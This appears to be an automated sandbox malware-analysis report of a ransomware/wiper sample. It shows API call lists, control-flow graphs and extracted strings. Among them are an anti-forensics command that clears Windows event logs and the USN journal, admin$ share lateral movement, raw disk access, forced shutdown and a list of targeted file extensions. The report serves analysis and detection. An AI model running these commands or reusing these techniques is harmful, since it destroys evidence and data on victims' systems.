                                                • CreateThread.KERNELBASE(00000000,00000000,02E57C10,00000000,00000000,00000000), ref: 02E57E99
                                                • CreateThread.KERNEL32(00000000,00000000,02E59F8E,00000000,00000004,00000000), ref: 02E57F2B
                                                • SetThreadToken.ADVAPI32(?,?), ref: 02E57F3B
                                                • ResumeThread.KERNEL32(?), ref: 02E57F48
                                                • GetLastError.KERNEL32 ref: 02E57F55
                                                • CloseHandle.KERNEL32(?), ref: 02E57F61
                                                • SetLastError.KERNEL32(00000057), ref: 02E57F73
                                                  • Part of subcall function 02E59590: VirtualAlloc.KERNEL32(00000000,?,00001000,00000004,?,?,?,?,?,?,02E57E14,?,?,?), ref: 02E595CC
                                                  • Part of subcall function 02E59590: memcpy.MSVCRT ref: 02E595E5
                                                  • Part of subcall function 02E59590: VirtualProtect.KERNEL32(00000000,?,00000004,?), ref: 02E59654
                                                  • Part of subcall function 02E59590: VirtualFree.KERNEL32(00000000,?,00004000), ref: 02E59674
                                                • CreateThread.KERNEL32(00000000,00000000,02E57D58,?,00000004,00000000), ref: 02E57F8F
                                                • SetThreadToken.ADVAPI32(000000FF,00000057), ref: 02E57F9F
                                                • ResumeThread.KERNEL32(000000FF), ref: 02E57FAC
                                                • WaitForSingleObject.KERNEL32(000000FF,000000FF), ref: 02E57FBC
                                                • GetLastError.KERNEL32 ref: 02E57FC4
                                                • CloseHandle.KERNEL32(000000FF), ref: 02E57FCD
                                                • CreateThread.KERNELBASE(00000000,00000000,02E5A0FE,00000000,00000000,00000000), ref: 02E58006
                                                • GetProcessHeap.KERNEL32(00000008,00000004,000000FF,?,?,?), ref: 02E58033
                                                • HeapAlloc.KERNEL32(00000000), ref: 02E58036
                                                • CreateThread.KERNELBASE(00000000,00000000,02E5A274,00000000,00000000,00000000), ref: 02E58058
                                                • GetProcessHeap.KERNEL32(00000000,?), ref: 02E58062
                                                • HeapFree.KERNEL32(00000000), ref: 02E58065
                                                • Sleep.KERNELBASE(000000FF), ref: 02E5807B
                                                • Sleep.KERNELBASE(?), ref: 02E58095
                                                • memset.MSVCRT ref: 02E580AE
                                                • GetVersionExW.KERNEL32(?), ref: 02E580C3
                                                • ExitProcess.KERNEL32 ref: 02E58115
                                                • Sleep.KERNELBASE(?), ref: 02E58125
                                                • wsprintfW.USER32 ref: 02E5813B
                                                • GetModuleHandleA.KERNEL32(ntdll.dll,00000003), ref: 02E58168
                                                • GetProcAddress.KERNEL32(00000000,NtRaiseHardError), ref: 02E58178
                                                • NtRaiseHardError.NTDLL(C0000350,00000000,00000000,00000000,00000006,?), ref: 02E58190
                                                • InitiateSystemShutdownExW.ADVAPI32(00000000,00000000,00000000,00000001,00000001,80000000), ref: 02E5819E
                                                • ExitWindowsEx.USER32(00000006,00000000), ref: 02E581AF
                                                Strings
                                                • ntdll.dll, xrefs: 02E58163
                                                • NtRaiseHardError, xrefs: 02E58172
                                                • wevtutil cl Setup & wevtutil cl System & wevtutil cl Security & wevtutil cl Application & fsutil usn deletejournal /D %c:, xrefs: 02E58135
                                                • W, xrefs: 02E57F69
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1670404172.0000000002E51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E50000, based on PE: true
                                                • Associated: 00000001.00000002.1670391522.0000000002E50000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670422121.0000000002E5D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670439890.0000000002E66000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670439890.0000000002E6F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670467256.0000000002E70000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_2e50000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Thread$Heap$Create$Process$ErrorFileHandle$AllocCloseFreeLastSleepVirtual$ExitModuleResumeToken$AddressCountCriticalHardInitializeInitiateNameObjectProcProtectRaiseReadSectionShutdownSingleSizeStartupSystemTickVersionWaitWindowsmemcpymemsetwsprintf
                                                • String ID: NtRaiseHardError$W$ntdll.dll$wevtutil cl Setup & wevtutil cl System & wevtutil cl Security & wevtutil cl Application & fsutil usn deletejournal /D %c:
                                                • API String ID: 2045654421-1731753139
                                                • Opcode ID: 32cb3f9a3d9f9fa8452769971408a0bc0441f9d53a30ee1a576709779a9e808e
                                                • Instruction ID: 6882a8c26b32a0075dff1757d89960c3331cada64e22c5289fec2b13d28a8aef
                                                • Opcode Fuzzy Hash: 32cb3f9a3d9f9fa8452769971408a0bc0441f9d53a30ee1a576709779a9e808e
                                                • Instruction Fuzzy Hash: EEB1C3709E0369ABDB20DF62DD4DE9B7BB9AF85704F009919FD0596090DB3089E0CB71
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02E59987 Relevance: 58.0, APIs: 29, Strings: 4, Instructions: 296shareprocessthreadCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 85 2e59987-2e599ab call 2e5a4f0 88 2e59d97 85->88 89 2e599b1-2e59a2c wsprintfW call 2e58b70 wsprintfW 85->89 91 2e59d9f-2e59da4 88->91 95 2e59a2f-2e59a7f WNetAddConnection2W wsprintfW PathFindExtensionW 89->95 93 2e59da6-2e59daa 91->93 94 2e59dac-2e59dc0 SetLastError 91->94 93->94 96 2e59a81-2e59a96 PathFileExistsW 95->96 97 2e59aa2-2e59ac1 call 2e58946 95->97 99 2e59b17-2e59b1f 96->99 100 2e59a98-2e59a9e GetLastError 96->100 103 2e59b24-2e59b27 97->103 104 2e59ac3-2e59ad0 GetLastError 97->104 102 2e59d7c-2e59d81 99->102 100->97 102->91 105 2e59d83-2e59d95 WNetCancelConnection2W 102->105 107 2e59b43-2e59b63 GetCurrentThread OpenThreadToken 103->107 108 2e59b29-2e59b2c 103->108 104->102 106 2e59ad6-2e59ad9 104->106 105->91 106->102 109 2e59adf-2e59ae2 106->109 111 2e59b65-2e59b78 DuplicateTokenEx 107->111 112 2e59b7e 107->112 108->107 110 2e59b2e-2e59b39 call 2e56ce7 108->110 109->102 114 2e59ae8-2e59af0 109->114 110->107 111->112 113 2e59b82-2e59b86 112->113 116 2e59b8c-2e59bd3 memset 113->116 117 2e59d58-2e59d5c 113->117 114->102 118 2e59af6-2e59afa 114->118 120 2e59bd5-2e59beb call 2e597a5 116->120 121 2e59bed-2e59bf1 116->121 123 2e59d6c-2e59d70 117->123 124 2e59d5e-2e59d68 CloseHandle 117->124 118->91 122 2e59b00-2e59b12 WNetCancelConnection2W 118->122 120->121 126 2e59c26-2e59c2e 121->126 127 2e59bf3-2e59bf6 121->127 122->95 123->102 128 2e59d72-2e59d76 CloseHandle 123->128 124->123 132 2e59c34-2e59c3c 126->132 133 2e59d2b-2e59d31 GetLastError 126->133 130 2e59bfc-2e59bff 127->130 131 2e59d4a-2e59d52 DeleteFileW 127->131 128->102 130->131 135 2e59c05-2e59c24 call 2e598ab 130->135 131->117 132->133 136 2e59c42-2e59c6a 132->136 134 2e59d35-2e59d3e 133->134 134->113 137 2e59d44-2e59d48 134->137 135->126 139 2e59c6c-2e59c76 CreateProcessAsUserW 136->139 140 2e59c78 CreateProcessW 136->140 137->117 137->131 141 2e59c7e-2e59c80 139->141 140->141 141->133 143 2e59c86-2e59caf WaitForSingleObject GetExitCodeProcess 141->143 144 2e59cb7-2e59cbb 143->144 145 2e59cb1-2e59cb5 CloseHandle 143->145 146 2e59cc3-2e59cc7 144->146 147 2e59cbd-2e59cc1 CloseHandle 144->147 145->144 148 2e59ccf-2e59cd3 146->148 149 2e59cc9-2e59ccd CloseHandle 146->149 147->146 150 2e59cd5-2e59cd9 CloseHandle 148->150 151 2e59cdb-2e59cdf 148->151 149->148 150->151 152 2e59ce7-2e59ceb 151->152 153 2e59ce1-2e59ce5 CloseHandle 151->153 154 2e59d00-2e59d04 152->154 155 2e59ced-2e59cf1 152->155 153->152 156 2e59d17-2e59d29 PathFileExistsW 154->156 157 2e59d06-2e59d15 154->157 155->156 158 2e59cf3-2e59cf8 155->158 156->134 157->134 157->156 158->156 159 2e59cfa-2e59cfe 158->159 159->134
                                                APIs
                                                • wsprintfW.USER32 ref: 02E599D1
                                                  • Part of subcall function 02E58B70: PathFindFileNameW.SHLWAPI(C:\Windows\dllcm.dat,?,?,02E59A11), ref: 02E58B80
                                                • wsprintfW.USER32 ref: 02E59A2A
                                                • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 02E59A4C
                                                • wsprintfW.USER32 ref: 02E59A6A
                                                • PathFindExtensionW.SHLWAPI(?), ref: 02E59A77
                                                • PathFileExistsW.SHLWAPI(?), ref: 02E59A8E
                                                • GetLastError.KERNEL32 ref: 02E59A98
                                                • GetLastError.KERNEL32(?,00000001), ref: 02E59AC3
                                                • WNetCancelConnection2W.MPR(?,00000000,00000001), ref: 02E59B0C
                                                • GetCurrentThread.KERNEL32 ref: 02E59B54
                                                • OpenThreadToken.ADVAPI32(00000000), ref: 02E59B5B
                                                • DuplicateTokenEx.ADVAPI32(?,02000000,00000000,00000002,00000001,?), ref: 02E59B78
                                                • memset.MSVCRT ref: 02E59BB1
                                                • CreateProcessAsUserW.ADVAPI32(?,?,?,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 02E59C70
                                                • CreateProcessW.KERNEL32(?,?,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 02E59C78
                                                • WaitForSingleObject.KERNEL32(?,000000FF), ref: 02E59C8C
                                                • GetExitCodeProcess.KERNEL32(?,?), ref: 02E59C9F
                                                • CloseHandle.KERNEL32(?), ref: 02E59CB5
                                                • CloseHandle.KERNEL32(?), ref: 02E59CC1
                                                • CloseHandle.KERNEL32(?), ref: 02E59CCD
                                                • CloseHandle.KERNEL32(?), ref: 02E59CD9
                                                • CloseHandle.KERNEL32(?), ref: 02E59CE5
                                                • PathFileExistsW.SHLWAPI(?), ref: 02E59D1F
                                                • GetLastError.KERNEL32 ref: 02E59D2B
                                                • DeleteFileW.KERNEL32(?), ref: 02E59D52
                                                • CloseHandle.KERNEL32(?), ref: 02E59D62
                                                • CloseHandle.KERNEL32(?), ref: 02E59D76
                                                  • Part of subcall function 02E56CE7: GetProcessHeap.KERNEL32(00000008,?,75BF73E0,00000000,?,?,?), ref: 02E56D1D
                                                  • Part of subcall function 02E56CE7: HeapAlloc.KERNEL32(00000000), ref: 02E56D26
                                                  • Part of subcall function 02E56CE7: memcpy.MSVCRT ref: 02E56D53
                                                  • Part of subcall function 02E56CE7: GetProcessHeap.KERNEL32(00000008,?,\\%ws\admin$\%ws), ref: 02E56D78
                                                  • Part of subcall function 02E56CE7: HeapAlloc.KERNEL32(00000000), ref: 02E56D7B
                                                  • Part of subcall function 02E56CE7: memcpy.MSVCRT ref: 02E56DAA
                                                  • Part of subcall function 02E56CE7: GetProcessHeap.KERNEL32(00000000,?,?), ref: 02E56DC7
                                                  • Part of subcall function 02E56CE7: HeapFree.KERNEL32(00000000), ref: 02E56DCA
                                                  • Part of subcall function 02E56CE7: GetProcessHeap.KERNEL32(00000000,?), ref: 02E56DD1
                                                  • Part of subcall function 02E56CE7: HeapFree.KERNEL32(00000000), ref: 02E56DD4
                                                • WNetCancelConnection2W.MPR(?,00000000,00000001), ref: 02E59D8F
                                                • SetLastError.KERNEL32(00000057,00000000,?,?,?,02E5A0C9,?,00000000,00000000,00000000), ref: 02E59DB0
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1670404172.0000000002E51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E50000, based on PE: true
                                                • Associated: 00000001.00000002.1670391522.0000000002E50000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670422121.0000000002E5D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670439890.0000000002E66000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670439890.0000000002E6F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670467256.0000000002E70000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_2e50000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Heap$CloseHandleProcess$ErrorFileLastPath$Connection2wsprintf$AllocCancelCreateExistsFindFreeThreadTokenmemcpy$CodeCurrentDeleteDuplicateExitExtensionNameObjectOpenSingleUserWaitmemset
                                                • String ID: D$W$\\%s\admin$$\\%ws\admin$\%ws
                                                • API String ID: 1621451837-2183621537
                                                • Opcode ID: 0dfb436318fb230fb56bd91039f6d65b02b5a711e7d7a2a07dda49e65c438d6c
                                                • Instruction ID: dc418a4694d26a9889160893033f94fd4edb97f8018a020cd74f630067801734
                                                • Opcode Fuzzy Hash: 0dfb436318fb230fb56bd91039f6d65b02b5a711e7d7a2a07dda49e65c438d6c
                                                • Instruction Fuzzy Hash: 8FC15C71998355EFDB20DF61C884ADBBBE8FF89308F049D2EF98992111D7309594CB92
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02E58E7F Relevance: 33.4, APIs: 18, Strings: 1, Instructions: 158memorythreadCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 194 2e58e7f-2e58ee5 call 2e5a4f0 memset * 2 GetAdaptersInfo 197 2e5907f-2e59087 194->197 198 2e58eeb-2e58eff LocalAlloc 194->198 198->197 199 2e58f05-2e58f0f GetAdaptersInfo 198->199 200 2e59075-2e59079 LocalFree 199->200 201 2e58f15-2e58f1d 199->201 200->197 202 2e58f23-2e58f63 inet_addr * 2 call 2e56916 201->202 203 2e58fc8-2e58fcf call 2e58243 201->203 210 2e58f65-2e58f7c call 2e56fc7 GetProcessHeap HeapFree 202->210 211 2e58f82-2e58f88 202->211 208 2e58fd1-2e58fd4 call 2e5908a 203->208 209 2e58fd9-2e58fdd 203->209 208->209 213 2e58fdf 209->213 214 2e5905e-2e59062 209->214 210->211 216 2e58fba-2e58fc2 211->216 217 2e58f8a-2e58f9c call 2e56916 211->217 218 2e58fe5-2e58ff3 LocalAlloc 213->218 214->200 221 2e59064-2e59073 CloseHandle 214->221 216->201 216->203 217->216 226 2e58f9e-2e58fb4 call 2e56fc7 GetProcessHeap HeapFree 217->226 222 2e58ff5-2e59014 inet_addr 218->222 223 2e59050-2e5905c 218->223 221->200 221->221 222->223 225 2e59016-2e5901e 222->225 223->214 223->218 225->223 227 2e59020-2e59046 htonl * 2 CreateThread 225->227 226->216 227->223 229 2e59048-2e5904c 227->229 229->223
                                                APIs
                                                • memset.MSVCRT ref: 02E58EA3
                                                • memset.MSVCRT ref: 02E58EC0
                                                • GetAdaptersInfo.IPHLPAPI(00000000,?), ref: 02E58EE0
                                                • LocalAlloc.KERNEL32(00000040,?), ref: 02E58EF1
                                                • GetAdaptersInfo.IPHLPAPI(00000000,?), ref: 02E58F0B
                                                • inet_addr.WS2_32(000001B0), ref: 02E58F30
                                                • inet_addr.WS2_32(000001C0), ref: 02E58F44
                                                  • Part of subcall function 02E56916: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,02E591A4,000000FF,00000000,00000000,00000000,00000000,74D65350,?,02E591A4,00000000), ref: 02E56935
                                                  • Part of subcall function 02E56916: GetProcessHeap.KERNEL32(00000000,00000000,?,02E591A4,00000000), ref: 02E56942
                                                  • Part of subcall function 02E56916: HeapAlloc.KERNEL32(00000000,?,02E591A4,00000000), ref: 02E56949
                                                  • Part of subcall function 02E56916: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,02E591A4,000000FF,00000000,00000000,?,02E591A4,00000000), ref: 02E56961
                                                • GetProcessHeap.KERNEL32(00000000,?,?,000001B0), ref: 02E58F75
                                                • HeapFree.KERNEL32(00000000), ref: 02E58F7C
                                                • GetProcessHeap.KERNEL32(00000000,?,?,00000200,000001B0), ref: 02E58FAD
                                                • HeapFree.KERNEL32(00000000), ref: 02E58FB4
                                                • LocalAlloc.KERNEL32(00000040,0000000C), ref: 02E58FE9
                                                • inet_addr.WS2_32(255.255.255.255), ref: 02E58FFA
                                                • htonl.WS2_32(?), ref: 02E59021
                                                • htonl.WS2_32(?), ref: 02E59029
                                                • CreateThread.KERNELBASE(00000000,00000000,02E58E04,00000000,00000000,00000000), ref: 02E5903E
                                                • CloseHandle.KERNEL32(?), ref: 02E59068
                                                • LocalFree.KERNEL32(?), ref: 02E59079
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1670404172.0000000002E51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E50000, based on PE: true
                                                • Associated: 00000001.00000002.1670391522.0000000002E50000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670422121.0000000002E5D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670439890.0000000002E66000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670439890.0000000002E6F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670467256.0000000002E70000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_2e50000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Heap$AllocFreeLocalProcessinet_addr$AdaptersByteCharInfoMultiWidehtonlmemset$CloseCreateHandleThread
                                                • String ID: 255.255.255.255
                                                • API String ID: 698255058-2422070025
                                                • Opcode ID: 6ebe8f748e229c07eeef9897ee5c6390eab8e1cdd92df2fc205a2efc89f32739
                                                • Instruction ID: f8fad3bd9ca46b2bd91f0ee4e83dc4d21be4403abd256d5149539c826d8f0e7e
                                                • Opcode Fuzzy Hash: 6ebe8f748e229c07eeef9897ee5c6390eab8e1cdd92df2fc205a2efc89f32739
                                                • Instruction Fuzzy Hash: 37516DB1994325EFD710EF61D88499BBBE9FF88314F509D2DFA9992100D7309494CFA2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02E51038 Relevance: 26.4, APIs: 12, Strings: 3, Instructions: 175fileCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 231 2e51038-2e510aa memset * 2 232 2e51221 231->232 233 2e510b0-2e510eb memset GetSystemDirectoryA 231->233 234 2e51226-2e5122a 232->234 235 2e510ed-2e510f5 GetLastError 233->235 236 2e5110a-2e5112b CreateFileA 233->236 235->234 237 2e510fb-2e51105 235->237 236->235 238 2e5112d-2e51148 DeviceIoControl 236->238 237->234 239 2e51166-2e5117d _itoa 238->239 240 2e5114a-2e51152 GetLastError 238->240 241 2e51180-2e51185 239->241 242 2e51154-2e51159 240->242 243 2e5115e-2e51161 240->243 241->241 245 2e51187-2e5118e 241->245 242->243 244 2e51213-2e5121f CloseHandle 243->244 244->234 246 2e51191-2e51196 245->246 246->246 247 2e51198-2e511a8 246->247 248 2e511b3-2e511b5 247->248 249 2e511aa-2e511b1 247->249 250 2e511b7-2e511be 248->250 251 2e511de 248->251 249->244 252 2e511c0 250->252 253 2e511c2-2e511dc memcpy 250->253 254 2e511e1-2e511e3 251->254 252->253 253->254 255 2e511e6-2e511eb 254->255 255->255 256 2e511ed-2e511f1 255->256 256->244 257 2e511f3-2e511fc 256->257 257->244 258 2e511fe-2e51210 memcpy 257->258 258->244
                                                APIs
                                                • memset.MSVCRT ref: 02E5105D
                                                • memset.MSVCRT ref: 02E51071
                                                • memset.MSVCRT ref: 02E510B9
                                                • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 02E510E3
                                                • GetLastError.KERNEL32(?,?,?,?,?,?,00000000,00000000,000001FF), ref: 02E510ED
                                                • CreateFileA.KERNELBASE(\\.\0:,00000000,00000003,00000000,00000003,00000000,00000000,?,?,?,?,?,?,00000000,00000000,000001FF), ref: 02E5111F
                                                • DeviceIoControl.KERNELBASE(00000000,00560000,00000000,00000000,?,00000020,?,00000000), ref: 02E51140
                                                • GetLastError.KERNEL32(?,?,?,?,?,?,00000000,00000000,000001FF), ref: 02E5114A
                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00000000,000001FF), ref: 02E51216
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1670404172.0000000002E51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E50000, based on PE: true
                                                • Associated: 00000001.00000002.1670391522.0000000002E50000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670422121.0000000002E5D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670439890.0000000002E66000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670439890.0000000002E6F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670467256.0000000002E70000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_2e50000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: memset$ErrorLast$CloseControlCreateDeviceDirectoryFileHandleSystem
                                                • String ID: \\.\0:$\\.\PhysicalDrive$z
                                                • API String ID: 1845136274-3982798494
                                                • Opcode ID: 3b7ce892da7d2e3a2cb6aec1701fb5348f36aab68d18436b163c1b2962ef7c85
                                                • Instruction ID: 87b5481b3af5d207a444e54254c2f7422f2cec7640859e6b257df0e72bb94e9f
                                                • Opcode Fuzzy Hash: 3b7ce892da7d2e3a2cb6aec1701fb5348f36aab68d18436b163c1b2962ef7c85
                                                • Instruction Fuzzy Hash: 98510572D90229AFDB10DFA4DC84BEE7B79AF05304F0081A5E959EB240D7355A89CBA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02E573FD Relevance: 25.6, APIs: 17, Instructions: 125memorypipesleepCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                APIs
                                                • GetProcessHeap.KERNEL32(00000008,00000014), ref: 02E57424
                                                • HeapAlloc.KERNEL32(00000000), ref: 02E57427
                                                • InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 02E5743B
                                                • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,00000000,00000000), ref: 02E57450
                                                • CreateNamedPipeW.KERNELBASE(?,00000003,00000006,00000001,00000000,00000000,00000000,0000000C), ref: 02E5746E
                                                • ConnectNamedPipe.KERNELBASE(00000000,00000000), ref: 02E5747E
                                                • PeekNamedPipe.KERNELBASE(?,00000000,00000000,00000000,?,00000000), ref: 02E5749E
                                                • Sleep.KERNELBASE(000003E8), ref: 02E574B2
                                                • GetProcessHeap.KERNEL32(00000008,?), ref: 02E574C3
                                                • HeapAlloc.KERNEL32(00000000), ref: 02E574C6
                                                • ReadFile.KERNEL32(?,00000000,?,?,00000000), ref: 02E574E1
                                                • StrChrW.SHLWAPI(00000000,0000003A), ref: 02E574F6
                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02E57513
                                                • HeapFree.KERNEL32(00000000), ref: 02E57516
                                                • FlushFileBuffers.KERNEL32(?), ref: 02E5751F
                                                • DisconnectNamedPipe.KERNEL32(?), ref: 02E57528
                                                • CloseHandle.KERNEL32(?), ref: 02E57531
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1670404172.0000000002E51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E50000, based on PE: true
                                                • Associated: 00000001.00000002.1670391522.0000000002E50000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670422121.0000000002E5D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670439890.0000000002E66000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670439890.0000000002E6F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670467256.0000000002E70000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_2e50000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Heap$NamedPipe$Process$AllocDescriptorFileSecurity$BuffersCloseConnectCreateDaclDisconnectFlushFreeHandleInitializePeekReadSleep
                                                • String ID:
                                                • API String ID: 1225799970-0
                                                • Opcode ID: 72d0da8932920c77450b330fb9e9e3dae548569cf898cf103ffb94dd29f30c12
                                                • Instruction ID: 23df68020779f541405c1ee28069bad884a467c208dc3a867e37c80784cb14d4
                                                • Opcode Fuzzy Hash: 72d0da8932920c77450b330fb9e9e3dae548569cf898cf103ffb94dd29f30c12
                                                • Instruction Fuzzy Hash: 0B416331DE0234BBDB216BA2DD49EAFBE3AEF45755F504854F905E5090C7708AA0CBA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02E51973 Relevance: 24.6, APIs: 10, Strings: 4, Instructions: 144filesynchronizationCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 280 2e51973-2e51985 281 2e51b46-2e51b4b 280->281 282 2e5198b-2e519a3 PathCombineW 280->282 282->281 283 2e519a9-2e519c3 FindFirstFileW 282->283 283->281 284 2e519c9 283->284 285 2e519cf-2e519d7 284->285 286 2e519f3-2e519f8 285->286 287 2e519d9-2e519e4 WaitForSingleObject 285->287 290 2e519fc-2e51a02 286->290 288 2e51b3c-2e51b40 FindClose 287->288 289 2e519ea-2e519ed 287->289 288->281 289->286 289->288 291 2e51a04-2e51a07 290->291 292 2e51a22-2e51a24 290->292 294 2e51a1e-2e51a20 291->294 295 2e51a09-2e51a11 291->295 293 2e51a27-2e51a29 292->293 296 2e51b25-2e51b36 FindNextFileW 293->296 297 2e51a2f-2e51a34 293->297 294->293 295->292 298 2e51a13-2e51a1c 295->298 296->285 296->288 299 2e51a38-2e51a3e 297->299 298->290 298->294 300 2e51a40-2e51a43 299->300 301 2e51a5e-2e51a60 299->301 302 2e51a45-2e51a4d 300->302 303 2e51a5a-2e51a5c 300->303 304 2e51a63-2e51a65 301->304 302->301 305 2e51a4f-2e51a58 302->305 303->304 304->296 306 2e51a6b-2e51a83 PathCombineW 304->306 305->299 305->303 306->296 307 2e51a89-2e51a8e 306->307 308 2e51a90-2e51a98 307->308 309 2e51ac2-2e51ad1 PathFindExtensionW 307->309 308->309 311 2e51a9a-2e51aab StrStrIW 308->311 310 2e51ad4-2e51add 309->310 310->310 312 2e51adf-2e51ae9 310->312 311->296 313 2e51aad-2e51abb call 2e51973 311->313 312->296 315 2e51aeb-2e51b13 wsprintfW StrStrIW 312->315 316 2e51ac0 313->316 315->296 317 2e51b15-2e51b20 call 2e5189a 315->317 316->296 317->296
                                                APIs
                                                • PathCombineW.SHLWAPI(?,?,02E60A6C,?,Microsoft Enhanced RSA and AES Cryptographic Provider), ref: 02E5199B
                                                • FindFirstFileW.KERNELBASE(?,?), ref: 02E519B6
                                                • WaitForSingleObject.KERNEL32(?,00000000), ref: 02E519DC
                                                • PathCombineW.SHLWAPI(?,?,?), ref: 02E51A7B
                                                • StrStrIW.SHLWAPI(C:\Windows;,?), ref: 02E51AA7
                                                • PathFindExtensionW.SHLWAPI(?), ref: 02E51AC7
                                                • wsprintfW.USER32 ref: 02E51AF9
                                                • StrStrIW.SHLWAPI(.3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.or,?), ref: 02E51B0F
                                                • FindNextFileW.KERNELBASE(?,?), ref: 02E51B2E
                                                • FindClose.KERNELBASE(?), ref: 02E51B40
                                                Strings
                                                • .3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.or, xrefs: 02E51B0A
                                                • Microsoft Enhanced RSA and AES Cryptographic Provider, xrefs: 02E51983
                                                • %ws., xrefs: 02E51AF3
                                                • C:\Windows;, xrefs: 02E51AA2
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1670404172.0000000002E51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E50000, based on PE: true
                                                • Associated: 00000001.00000002.1670391522.0000000002E50000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670422121.0000000002E5D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670439890.0000000002E66000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670439890.0000000002E6F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670467256.0000000002E70000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_2e50000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Find$Path$CombineFile$CloseExtensionFirstNextObjectSingleWaitwsprintf
                                                • String ID: %ws.$.3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.or$C:\Windows;$Microsoft Enhanced RSA and AES Cryptographic Provider
                                                • API String ID: 3034020945-2646354609
